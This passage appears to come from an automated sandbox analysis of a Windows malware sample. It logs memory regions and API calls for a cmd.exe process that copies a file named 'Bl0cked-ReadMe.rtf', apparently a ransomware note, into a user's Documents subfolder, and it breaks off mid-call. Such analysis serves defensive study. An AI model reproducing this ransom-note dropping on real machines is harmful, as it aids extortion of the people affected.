"0x7ea16a00" os_pid = "0xe8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14721 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14722 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14723 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14724 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 14725 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 14726 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14727 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14728 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 14729 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 14730 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 16190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 16191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 16192 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 16193 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 16194 start_va = 0x5e0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 16195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 16196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 16197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 16198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 16199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 16200 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 16201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 16202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 16203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 16204 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 16205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 16206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 16207 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 16208 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 16209 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 16210 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 16211 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 16212 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 16213 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 218 os_tid = 0xd94 [0141.958] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfdb4 | out: lpSystemTimeAsFileTime=0x2cfdb4*(dwLowDateTime=0x8e8c96c0, dwHighDateTime=0x1d440a9)) [0141.958] GetCurrentProcessId () returned 0xe8c [0141.958] GetCurrentThreadId () returned 0xd94 [0141.958] GetTickCount () returned 0x2c773 [0141.958] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfdac | out: lpPerformanceCount=0x2cfdac*=19874708713) returned 1 [0141.961] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0141.961] __set_app_type (_Type=0x1) [0141.961] __p__fmode () returned 0x76b331f4 [0141.961] __p__commode () returned 0x76b331fc [0141.961] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0141.961] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0141.961] GetCurrentThreadId () returned 0xd94 [0141.961] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd94) returned 0x38 [0141.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.962] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0141.962] SetThreadUILanguage (LangId=0x0) returned 0x409 [0141.962] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0141.962] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfd44 | out: phkResult=0x2cfd44*=0x0) returned 0x2 [0141.962] VirtualQuery (in: lpAddress=0x2cfd7b, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0141.962] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfd14, dwLength=0x1c | out: lpBuffer=0x2cfd14*(BaseAddress=0x2d0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0141.962] GetConsoleOutputCP () returned 0x1b5 [0141.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.962] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0141.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0141.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0141.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.963] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0141.963] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.963] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0141.963] _get_osfhandle (_FileHandle=0) returned 0x3 [0141.964] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0141.964] GetEnvironmentStringsW () returned 0x370198* [0141.964] FreeEnvironmentStringsW (penv=0x370198) returned 1 [0141.964] GetEnvironmentStringsW () returned 0x370198* [0141.964] FreeEnvironmentStringsW (penv=0x370198) returned 1 [0141.964] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecb4 | out: phkResult=0x2cecb4*=0x40) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0xc0, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x0, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.966] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegCloseKey (hKey=0x40) returned 0x0 [0141.967] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cecb4 | out: phkResult=0x2cecb4*=0x40) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x40, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x1, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x0, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x4, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x4) returned 0x0 [0141.967] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cecbc, lpData=0x2cecc0, lpcbData=0x2cecb8*=0x1000 | out: lpType=0x2cecbc*=0x0, lpData=0x2cecc0*=0x9, lpcbData=0x2cecb8*=0x1000) returned 0x2 [0141.967] RegCloseKey (hKey=0x40) returned 0x0 [0141.967] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886370 [0141.967] srand (_Seed=0x5b886370) [0141.967] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.967] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0141.967] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.968] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3718f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0141.968] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0141.968] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0141.968] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0141.968] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0141.968] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0141.968] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0141.968] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0141.968] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0141.969] GetEnvironmentStringsW () returned 0x3722e8* [0141.969] FreeEnvironmentStringsW (penv=0x3722e8) returned 1 [0141.969] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.969] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0141.969] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0141.969] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0141.969] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0141.969] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0141.969] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0141.969] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0141.969] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cfa80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.969] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cfa80, lpFilePart=0x2cfa7c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cfa7c*="Desktop") returned 0x18 [0141.969] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.969] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.969] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.970] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf7fc | out: lpFindFileData=0x2cf7fc) returned 0x370028 [0141.970] FindClose (in: hFindFile=0x370028 | out: hFindFile=0x370028) returned 1 [0141.970] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0141.970] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0141.970] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0141.970] GetEnvironmentStringsW () returned 0x372b08* [0141.970] FreeEnvironmentStringsW (penv=0x372b08) returned 1 [0141.971] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0141.971] GetConsoleOutputCP () returned 0x1b5 [0141.971] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0141.971] GetUserDefaultLCID () returned 0x409 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="0") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="0") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cfbc0, cchData=128 | out: lpLCData="1") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.972] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.972] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.973] GetConsoleTitleW (in: lpConsoleTitle=0x3608f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.325] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0142.325] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0142.325] _wcsicmp (_String1="type", _String2=")") returned 75 [0142.325] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0142.326] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0142.326] _wcsicmp (_String1="IF", _String2="type") returned -11 [0142.326] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0142.326] _wcsicmp (_String1="REM", _String2="type") returned -2 [0142.326] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0142.329] GetFileType (hFile=0x7) returned 0x2 [0142.329] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.329] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cfab8 | out: lpMode=0x2cfab8) returned 1 [0142.330] _dup (_FileHandle=1) returned 3 [0142.330] _close (_FileHandle=1) returned 0 [0142.330] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.330] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2cfa88, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.553] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.553] GetConsoleTitleW (in: lpConsoleTitle=0x2cf8b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.553] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.553] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.553] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.553] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.554] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2cf41c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2cf41c) returned 0x360e90 [0142.555] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.555] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.555] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.555] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ce328, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.555] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] GetFileType (hFile=0x54) returned 0x1 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ce380 | out: lpFileSizeHigh=0x2ce380*=0x0) returned 0x1632 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.555] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.555] ReadFile (in: hFile=0x54, lpBuffer=0x2cf1b8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce3a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b8*, 